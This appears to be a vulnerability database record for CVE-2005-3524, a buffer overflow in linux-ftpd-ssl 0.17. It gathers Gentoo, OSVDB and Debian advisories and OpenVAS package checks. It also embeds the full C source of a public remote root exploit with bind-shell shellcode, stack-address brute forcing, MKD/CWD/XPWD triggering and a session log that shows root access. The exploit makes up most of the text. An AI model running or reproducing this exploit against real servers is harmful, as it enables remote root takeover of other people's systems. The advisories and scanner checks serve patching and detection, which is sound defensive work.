ID CVE-2005-3524 Type cve Reporter cve@mitre.org Modified 2017-07-11T01:33:00
Description
Buffer overflow in the SSL-ready version of linux-ftpd (linux-ftpd-ssl) 0.17 allows remote attackers to execute arbitrary code by creating a long directory name, then executing the XPWD command.
{"gentoo": [{"lastseen": "2016-09-06T19:46:50", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3524"], "edition": 1, "description": "### Background\n\nlinux-ftpd-ssl is the netkit FTP server with encryption support. \n\n### Description\n\nA buffer overflow vulnerability has been found in the linux-ftpd-ssl package. A command that generates an excessively long response from the server may overrun a stack buffer. \n\n### Impact\n\nAn attacker that has permission to create directories that are accessible via the FTP server could exploit this vulnerability. Successful exploitation would execute arbitrary code on the local machine with root privileges. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll ftpd users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-ftp/netkit-ftpd-0.17-r3\"", "modified": "2007-12-30T00:00:00", "published": "2005-11-13T00:00:00", "id": "GLSA-200511-11", "href": "https://security.gentoo.org/glsa/200511-11", "type": "gentoo", "title": "linux-ftpd-ssl: Remote buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:17", "bulletinFamily": "software", "cvelist": ["CVE-2005-3524"], "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in linux-ftpd-ssl. The SSL code fails to validate input to the vsprintf() function resulting in a stack-based buffer overflow. With a specially crafted request which generates more than 2048 bytes of response from the server, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## Technical Description\nLinux-ftpd-ssl is a source code patch which is applied to NetKit ftpd. This flaw is introduced by the application of the patch to NetKit ftpd, and does not exist in the underlying program.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, James Longstreet has released an unofficial patch to address this vulnerability.\n## Short Description\nA remote overflow exists in linux-ftpd-ssl. The SSL code fails to validate input to the vsprintf() function resulting in a stack-based buffer overflow. With a specially crafted request which generates more than 2048 bytes of response from the server, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.\n## References:\nVendor URL: http://freshmeat.net/projects/linux-ftpd-ssl/\n[Secunia Advisory ID:17529](https://secuniaresearch.flexerasoftware.com/advisories/17529/)\n[Secunia Advisory ID:17465](https://secuniaresearch.flexerasoftware.com/advisories/17465/)\n[Secunia Advisory ID:17586](https://secuniaresearch.flexerasoftware.com/advisories/17586/)\nOther Advisory URL: http://www.debian.org/security/2005/dsa-896\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200511-11.xml\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0131.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0138.html\n[CVE-2005-3524](https://vulners.com/cve/CVE-2005-3524)\n", "modified": "2005-11-04T05:02:59", "published": "2005-11-04T05:02:59", "href": "https://vulners.com/osvdb/OSVDB:20530", "id": "OSVDB:20530", "type": "osvdb", "title": "Linux-ftpd-ssl FTP Server Response Remote Overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3524"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200511-11.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:55860", "href": "http://plugins.openvas.org/nasl.php?oid=55860", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200511-11 (linux-ftpd-ssl)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A buffer overflow vulnerability has been found, allowing a remote attacker\nto execute arbitrary code with escalated privileges on the local system.\";\ntag_solution = \"All ftpd users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-ftp/ftpd-0.17-r3'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200511-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=111573\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200511-11.\";\n\n \n\nif(description)\n{\n script_id(55860);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_bugtraq_id(15343);\n script_cve_id(\"CVE-2005-3524\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200511-11 (linux-ftpd-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-ftp/ftpd\", unaffected: make_list(\"ge 0.17-r3\"), vulnerable: make_list(\"lt 0.17-r3\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3524"], "description": "The remote host is missing an update to linux-ftpd-ssl\nannounced via advisory DSA 896-1.\n\nA buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.\n\nThe old stable distribution (woody) does not contain linux-ftpd-ssl\npackages.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:55876", "href": "http://plugins.openvas.org/nasl.php?oid=55876", "type": "openvas", "title": "Debian Security Advisory DSA 896-1 (linux-ftpd-ssl)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_896_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 896-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 0.17.18+0.3-3sarge1\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your ftpd-ssl package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20896-1\";\ntag_summary = \"The remote host is missing an update to linux-ftpd-ssl\nannounced via advisory DSA 896-1.\n\nA buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.\n\nThe old stable distribution (woody) does not contain linux-ftpd-ssl\npackages.\";\n\n\nif(description)\n{\n script_id(55876);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:03:37 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(15343);\n script_cve_id(\"CVE-2005-3524\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 896-1 (linux-ftpd-ssl)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ftpd-ssl\", ver:\"0.17.18+0.3-3sarge1\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T13:57:17", "description": "linux-ftpd-ssl 0.17 (MKD/CWD) Remote Root Exploit. CVE-2005-3524. Remote exploit for linux platform", "published": "2005-11-05T00:00:00", "type": "exploitdb", "title": "linux-ftpd-ssl 0.17 MKD/CWD Remote Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3524"], "modified": "2005-11-05T00:00:00", "id": "EDB-ID:1295", "href": "https://www.exploit-db.com/exploits/1295/", "sourceData": "/*Oct2005 VER2*/\r\n/**********************************************************/\r\n/** lnxFTPDssl_warez.c **/\r\n/** linux-ftpd-ssl 0.17 remote r00t exploit by kcope **/\r\n/** for all of those who installed the ssl ready version **/\r\n/** of linux-ftpd to be more \"secure\" **/\r\n/** **/\r\n/** be aware of the buffer overflows, **/\r\n/** the code is strong cryto **/\r\n/**********************************************************/\r\n/** thanx blackzero,revoguard,wY!,net_spy **/\r\n/** Confidential. Keep Private! **/\r\n/**********************************************************/\r\n/**\r\nC:\\Dokumente und Einstellungen\\Administrator\\Desktop>telnet 192.168.2.9 21\r\n220 localhost.localdomain FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready.\r\nAUTH SSL\r\n234 AUTH SSL OK.\r\n;PpPpPPpPPPpPPPPpPppPPPPPpPpPPPpPPpPpPPpPPPpPPPPpPppPPPPPpPpPPPpP\r\nC:\\Dokumente und Einstellungen\\Administrator\\Desktop>lnxFTPDssl_warez.exe 192.168.2.9 kcope password\r\nlnxFTPDssl_warez.c\r\nlinux-ftpd-ssl 0.17 remote r00t exploit by kcope\r\n\r\nconnecting to 192.168.2.9:21... ok.\r\nOK - STARTING ATTACK\r\n+++ USING STACK ADDRESS 0xbfffcc03 +++\r\n+++ USING STACK ADDRESS 0xbfffcc13 +++\r\n+++ USING STACK ADDRESS 0xbfffcc23 +++\r\n+++ USING STACK ADDRESS 0xbfffcc33 +++\r\n+++ USING STACK ADDRESS 0xbfffcc43 +++\r\n+++ USING STACK ADDRESS 0xbfffcc53 +++\r\n+++ USING STACK ADDRESS 0xbfffcc63 +++\r\n+++ USING STACK ADDRESS 0xbfffcc73 +++\r\n+++ USING STACK ADDRESS 0xbfffcc83 +++\r\n+++ USING STACK ADDRESS 0xbfffcc93 +++\r\n+++ USING STACK ADDRESS 0xbfffcca3 +++\r\n+++ USING STACK ADDRESS 0xbfffccb3 +++\r\n+++ USING STACK ADDRESS 0xbfffccc3 +++\r\n+++ USING STACK ADDRESS 0xbfffccd3 +++\r\n+++ USING STACK ADDRESS 0xbfffcce3 +++\r\n+++ USING STACK ADDRESS 0xbfffccf3 +++\r\n+++ USING STACK ADDRESS 0xbfffcd03 +++\r\n+++ USING STACK ADDRESS 0xbfffcd13 +++\r\n+++ USING STACK ADDRESS 0xbfffcd23 +++\r\n+++ USING STACK ADDRESS 0xbfffcd33 +++\r\n+++ USING STACK ADDRESS 0xbfffcd43 +++\r\n+++ USING STACK ADDRESS 0xbfffcd53 +++\r\n+++ USING STACK ADDRESS 0xbfffcd63 +++\r\n+++ USING STACK ADDRESS 0xbfffcd73 +++\r\n+++ USING STACK ADDRESS 0xbfffcd83 +++\r\n+++ USING STACK ADDRESS 0xbfffcd93 +++\r\n+++ USING STACK ADDRESS 0xbfffcda3 +++\r\n+++ USING STACK ADDRESS 0xbfffcdb3 +++\r\n+++ USING STACK ADDRESS 0xbfffcdc3 +++\r\n+++ USING STACK ADDRESS 0xbfffcdd3 +++\r\n+++ USING STACK ADDRESS 0xbfffcde3 +++\r\n+++ USING STACK ADDRESS 0xbfffcdf3 +++\r\n+++ USING STACK ADDRESS 0xbfffce03 +++\r\n+++ USING STACK ADDRESS 0xbfffce13 +++\r\n+++ USING STACK ADDRESS 0xbfffce23 +++\r\n+++ USING STACK ADDRESS 0xbfffce33 +++\r\n+++ USING STACK ADDRESS 0xbfffce43 +++\r\n+++ USING STACK ADDRESS 0xbfffce53 +++\r\n+++ USING STACK ADDRESS 0xbfffce63 +++\r\n+++ USING STACK ADDRESS 0xbfffce73 +++\r\n+++ USING STACK ADDRESS 0xbfffce83 +++\r\n+++ USING STACK ADDRESS 0xbfffce93 +++\r\n+++ USING STACK ADDRESS 0xbfffcea3 +++\r\n+++ USING STACK ADDRESS 0xbfffceb3 +++\r\n+++ USING STACK ADDRESS 0xbfffcec3 +++\r\n\r\nLet's get ready to rumble!\r\nid\r\nuid=0(root) gid=0(root) egid=1000(kcope) groups=1000(kcope),20(dialout),24(cdrom\r\n),25(floppy),29(audio),44(video),46(plugdev)\r\nuname -a\r\nLinux debian 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux\r\n\r\n**/\r\n// Tested on Linux 2.4.18-14 Redhat 8.0\r\n// Linux 2.2.20-idepci Debian GNU 3.0\r\n// Linux 2.4.27-2-386 Debian GNU 3.1\r\n// CHECK VER3 FOR MORE SUPPORT!!!\r\n// ***KEEP IT ULTRA PRIV8***\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <sys/time.h>\r\n#include <unistd.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n\r\n#define BUF_SIZ 4096\r\n#define PORT 21\r\n#define BINDPORT 30464\r\n#define STACK_START 0xbfffcc03\r\n#define STACK_END 0xbffff4f0\r\n\r\n/*my shellcode*/\r\n/*setreuid,chroot break,\r\nbind to port 30464, 0xff is double*/\r\nunsigned char lnx_bind[] =\r\n\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\n\"\\xEB\\x70\\x31\\xC0\\x31\\xDB\\x31\\xC9\"\r\n\"\\xB0\\x46\\xCD\\x80\\x5E\\x90\\xB8\\xBE\"\r\n\"\\xff\\xff\\xff\\xff\\xff\\xff\\xF7\\xD0\"\r\n\"\\x89\\x06\\xB0\\x27\\x8D\\x1E\\xFE\\xC5\"\r\n\"\\xB1\\xED\\xCD\\x80\\x31\\xC0\\x8D\\x1E\"\r\n\"\\xB0\\x3D\\xCD\\x80\\x66\\xB9\\xff\\xff\"\r\n\"\\x03\\xBB\\xD2\\xD1\\xD0\\xff\\xff\\xF7\"\r\n\"\\xDB\\x89\\x1E\\x8D\\x1E\\xB0\\x0C\\xCD\"\r\n\"\\x80\\xE2\\xEF\\xB8\\xD1\\xff\\xff\\xff\"\r\n\"\\xff\\xff\\xff\\xF7\\xD0\\x89\\x06\\xB0\"\r\n\"\\x3D\\x8D\\x1E\\xCD\\x80\\x31\\xC0\\x31\"\r\n\"\\xDB\\x89\\xF1\\xB0\\x02\\x89\\x06\\xB0\"\r\n\"\\x01\\x89\\x46\\x04\\xB0\\x06\\x89\\x46\"\r\n\"\\x08\\xB0\\x66\\x43\\xCD\\x80\\x89\\xF1\"\r\n\"\\x89\\x06\\xB0\\x02\\x66\\x89\\x46\\x0C\"\r\n\"\\xEB\\x04\\xEB\\x74\\xEB\\x77\\xB0\\x77\"\r\n\"\\x66\\x89\\x46\\x0E\\x8D\\x46\\x0C\\x89\"\r\n\"\\x46\\x04\\x31\\xC0\\x89\\x46\\x10\\xB0\"\r\n\"\\x10\\x89\\x46\\x08\\xB0\\x66\\x43\\xCD\"\r\n\"\\x80\\xB0\\x01\\x89\\x46\\x04\\xB0\\x66\"\r\n\"\\xB3\\x04\\xCD\\x80\\x31\\xC0\\x89\\x46\"\r\n\"\\x04\\x89\\x46\\x08\\xB0\\x66\\xB3\\x05\"\r\n\"\\xCD\\x80\\x88\\xC3\\xB0\\x3F\\x31\\xC9\"\r\n\"\\xCD\\x80\\xB0\\x3F\\xB1\\x01\\xCD\\x80\"\r\n\"\\xB0\\x3F\\xB1\\x02\\xCD\\x80\\xB8\\xD0\"\r\n\"\\x9D\\x96\\x91\\xF7\\xD0\\x89\\x06\\xB8\"\r\n\"\\xD0\\x8C\\x97\\xD0\\xF7\\xD0\\x89\\x46\"\r\n\"\\x04\\x31\\xC0\\x88\\x46\\x07\\x89\\x76\"\r\n\"\\x08\\x89\\x46\\x0C\\xB0\\x0B\\x89\\xF3\"\r\n\"\\x8D\\x4E\\x08\\x8D\\x56\\x0C\\xCD\\x80\"\r\n\"\\xE8\\x15\\xff\\xff\\xff\\xff\\xff\\xff\";\r\n\r\nlong ficken() {\r\n printf(\"lnxFTPDssl_warez.c\\nlinux-ftpd-ssl 0.17 remote r00t exploit by kcope\\n\\n\");\r\n return 0xc0debabe;\r\n}\r\n\r\nvoid usage(char **argv) {\r\n printf(\"Insufficient parameters given.\\n\");\r\n printf(\"Usage: %s <remotehost> <user> <pass> [writeable directory]\\n\", argv[0]);\r\n exit(0);\r\n}\r\n\r\nvoid _recv(int sock, char *buf) {\r\n int bytes=recv(sock, buf, BUFSIZ, 0);\r\n if (bytes < 0) {\r\n perror(\"read() failed\");\r\n exit(1);\r\n }\r\n}\r\n\r\nvoid attack(int sock, unsigned long ret, char *pad) {\r\n int i,k;\r\n char *x=(char*)malloc(1024);\r\n char *bufm=(char*)malloc(1024);\r\n char *bufc=(char*)malloc(1024);\r\n char *rbuf=(char*)malloc(BUFSIZ+10);\r\n char *nops=(char*)malloc(1024);\r\n unsigned char a,b,c,d;\r\n\r\n memset(nops,0,1024);\r\n memset(nops,0x90,255);\r\n memset(x,0,1024);\r\n for (i=0,k=0;i<60;i++) {\r\n a=(ret >> 24) & 0xff;\r\n b=(ret >> 16) & 0xff;\r\n c=(ret >> 8) & 0xff;\r\n d=(ret) & 0xff;\r\n\r\n if (d==255) {\r\n x[k]=d;\r\n x[++k]=255;\r\n } else {\r\n x[k]=d;\r\n }\r\n\r\n if (c==255) {\r\n x[k+1]=c;\r\n x[++k+1]=255;\r\n } else {\r\n x[k+1]=c;\r\n }\r\n\r\n if (b==255) {\r\n x[k+2]=b;\r\n x[++k+2]=255;\r\n } else {\r\n x[k+2]=b;\r\n }\r\n\r\n if (a==255) {\r\n x[k+3]=a;\r\n x[++k+3]=255;\r\n } else {\r\n x[k+3]=a;\r\n }\r\n\r\n k+=4;\r\n }\r\n\r\n snprintf(bufm, 1000, \"MKD %s%s\\r\\n\", pad, x); // 1x'A' redhat 8.0 / 2x'A' debian gnu 3.0 / 3x'A' debian gnu 3.1\r\n snprintf(bufc, 1000, \"CWD %s%s\\r\\n\", pad, x);\r\n for (i=0; i<11; i++) {\r\n send(sock, bufm, strlen(bufm), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n send(sock, bufc, strlen(bufc), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n }\r\n\r\n for (i=0; i<2; i++) {\r\n snprintf(bufm, 1000, \"MKD %s\\r\\n\", lnx_bind);\r\n snprintf(bufc, 1000, \"CWD %s\\r\\n\", lnx_bind);\r\n send(sock, bufm, strlen(bufm), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n send(sock, bufc, strlen(bufc), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n\r\n snprintf(bufm, 1000, \"MKD %s\\r\\n\", nops);\r\n snprintf(bufc, 1000, \"CWD %s\\r\\n\", nops);\r\n send(sock, bufm, strlen(bufm), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n send(sock, bufc, strlen(bufc), 0);\r\n recv(sock, rbuf, BUFSIZ, 0);\r\n }\r\n\r\n send(sock, \"XPWD\\r\\n\", strlen(\"XPWD\\r\\n\"), 0);\r\n\r\n free(bufm);\r\n free(bufc);\r\n free(x);\r\n free(rbuf);\r\n}\r\n\r\nint do_remote_shell(int sockfd)\r\n{\r\n while(1)\r\n {\r\n fd_set fds;\r\n FD_ZERO(&fds);\r\n FD_SET(0,&fds);\r\n FD_SET(sockfd,&fds);\r\n if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))\r\n {\r\n int cnt;\r\n char buf[1024];\r\n if(FD_ISSET(0,&fds))\r\n {\r\n if((cnt=read(0,buf,1024))<1)\r\n {\r\n if(errno==EWOULDBLOCK||errno==EAGAIN)\r\n continue;\r\n else\r\n break;\r\n }\r\n write(sockfd,buf,cnt);\r\n }\r\n if(FD_ISSET(sockfd,&fds))\r\n {\r\n if((cnt=read(sockfd,buf,1024))<1)\r\n {\r\n if(errno==EWOULDBLOCK||errno==EAGAIN)\r\n continue;\r\n else\r\n break;\r\n }\r\n write(1,buf,cnt);\r\n }\r\n }\r\n }\r\n}\r\n\r\nint do_connect (char *remotehost, int port) {\r\n struct hostent *host;\r\n struct sockaddr_in addr;\r\n int s;\r\n\r\n if (!inet_aton(remotehost, &addr.sin_addr))\r\n {\r\n host = gethostbyname(remotehost);\r\n if (!host)\r\n {\r\n perror(\"gethostbyname() failed\");\r\n return -1;\r\n }\r\n addr.sin_addr = *(struct in_addr*)host->h_addr;\r\n }\r\n\r\n s = socket(PF_INET, SOCK_STREAM, 0);\r\n if (s == -1)\r\n {\r\n perror(\"socket() failed\");\r\n return -1;\r\n }\r\n\r\n addr.sin_port = htons(port);\r\n addr.sin_family = AF_INET;\r\n\r\n if (connect(s, (struct sockaddr*)&addr, sizeof(addr)) == -1)\r\n {\r\n if (port == PORT) perror(\"connect() failed\");\r\n return -1;\r\n }\r\n\r\n return s;\r\n}\r\n\r\nvoid do_login(int s, char *buf, char *sendbuf, char *user, char *pass) {\r\n memset(buf, 0, sizeof(buf));\r\n memset(sendbuf, 0, sizeof(sendbuf));\r\n do {\r\n _recv(s, buf);\r\n } while (strstr(buf, \"220 \") == NULL);\r\n snprintf(sendbuf, BUFSIZ, \"USER %s\\r\\n\", user);\r\n send(s, sendbuf, strlen(sendbuf), 0);\r\n do {\r\n _recv(s, buf);\r\n } while (strstr(buf, \"331 \") == NULL);\r\n\r\n snprintf(sendbuf, BUFSIZ, \"PASS %s\\r\\n\", pass);\r\n send(s, sendbuf, strlen(sendbuf), 0);\r\n do {\r\n _recv(s, buf);\r\n } while (strstr(buf, \"230 \") == NULL);\r\n}\r\n\r\nint main(int argc, char **argv) {\r\n char remotehost[255];\r\n char user[255];\r\n char pass[255];\r\n char pad[10];\r\n char *buf,*sendbuf;\r\n int stackaddr=STACK_START;\r\n int s,sr00t,i;\r\n\r\n ficken();\r\n if (argc < 4)\r\n usage(argv);\r\n\r\n strncpy(remotehost, argv[1], sizeof(remotehost));\r\n remotehost[sizeof(remotehost)-1]=0;\r\n strncpy(user, argv[2], sizeof(user));\r\n user[sizeof(user)-1]=0;\r\n strncpy(pass, argv[3], sizeof(pass));\r\n pass[sizeof(pass)-1]=0;\r\n\r\n printf(\"connecting to %s:%d...\", remotehost, PORT);\r\n fflush(stdout);\r\n\r\n s=do_connect(remotehost, PORT);\r\n\r\n puts(\" ok.\");\r\n buf=(char*)malloc(BUFSIZ+10);\r\n sendbuf=(char*)malloc(BUFSIZ+10);\r\n do_login(s, buf, sendbuf, user, pass);\r\n\r\n if (strstr(buf, \"230\")!=NULL) {\r\n printf(\"OK - STARTING ATTACK\\n\");\r\n i=0;\r\n while (stackaddr <= STACK_END) {\r\n printf(\"+++ USING STACK ADDRESS 0x%.08x +++\\n\", stackaddr);\r\n\r\n sleep(1);\r\n\r\n if (i==1) {\r\n strcpy(pad, \"A\");\r\n }\r\n\r\n if (i==2) {\r\n strcpy(pad, \"AA\");\r\n }\r\n\r\n if (i==3) {\r\n strcpy(pad, \"AAA\");\r\n i=0;\r\n }\r\n\r\n attack(s, stackaddr, pad);\r\n close(s);\r\n s=do_connect(remotehost, PORT);\r\n do_login(s, buf, sendbuf, user, pass);\r\n\r\n if (argv[4] != NULL) {\r\n snprintf(sendbuf, BUFSIZ, \"CWD %s\\r\\n\", argv[4]);\r\n send(s, sendbuf, strlen(sendbuf), 0);\r\n recv(s, buf, BUFSIZ, 0);\r\n }\r\n\r\n if((sr00t=do_connect(remotehost, BINDPORT)) > 0) {\r\n /* XXX Remote r00t */\r\n printf(\"\\nLet's get ready to rumble!\\n\");\r\n do_remote_shell(sr00t);\r\n exit(0);\r\n }\r\n\r\n stackaddr+=16;\r\n i++;\r\n }\r\n } else {\r\n printf(\"\\nLogin incorrect\\n\");\r\n exit(1);\r\n }\r\n\r\n free(buf);\r\n free(sendbuf);\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2005-11-05]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1295/"}], "debian": [{"lastseen": "2020-11-11T13:23:53", "bulletinFamily": "unix", "cvelist": ["CVE-2005-3524"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 896-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nNovember 15th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : linux-ftpd-ssl\nVulnerability : buffer overflow\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2005-3524\nDebian Bug : 339074\n\nA buffer overflow has been discovered in ftpd-ssl, a simple BSD FTP\nserver with SSL encryption support, that could lead to the execution\nof arbitrary code.\n\nThe old stable distribution (woody) does not contain linux-ftpd-ssl\npackages.\n\nFor the stable distribution (sarge) this problem has been fixed in\nversion 0.17.18+0.3-3sarge1\n\nFor the unstable distribution (sid) this problem will be fixed soon.\n\nWe recommend that you upgrade your ftpd-ssl package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/linux-ftpd-ssl_0.17.18+0.3-3sarge1.dsc\n Size/MD5 checksum: 640 f1999dff20d8e5c7bebbdf3ae08d9fbc\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/linux-ftpd-ssl_0.17.18+0.3-3sarge1.diff.gz\n Size/MD5 checksum: 5157 bb183553291a97a7505dd3eba1ee28aa\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/linux-ftpd-ssl_0.17.18+0.3.orig.tar.gz\n Size/MD5 checksum: 61388 525f77ad02c5593fa4c5cad9abc337b7\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_alpha.deb\n Size/MD5 checksum: 55448 5e4b657d47730305099a47ec2d8c84df\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/l/linux-ftpd-ssl/ftpd-ssl_0.17.18+0.3-3sarge1_amd64.deb\n Size/MD5 checksum: 50938 87ab0d101dc0e1c14d38888231abf11f\n\n ARM architecture:\n\n 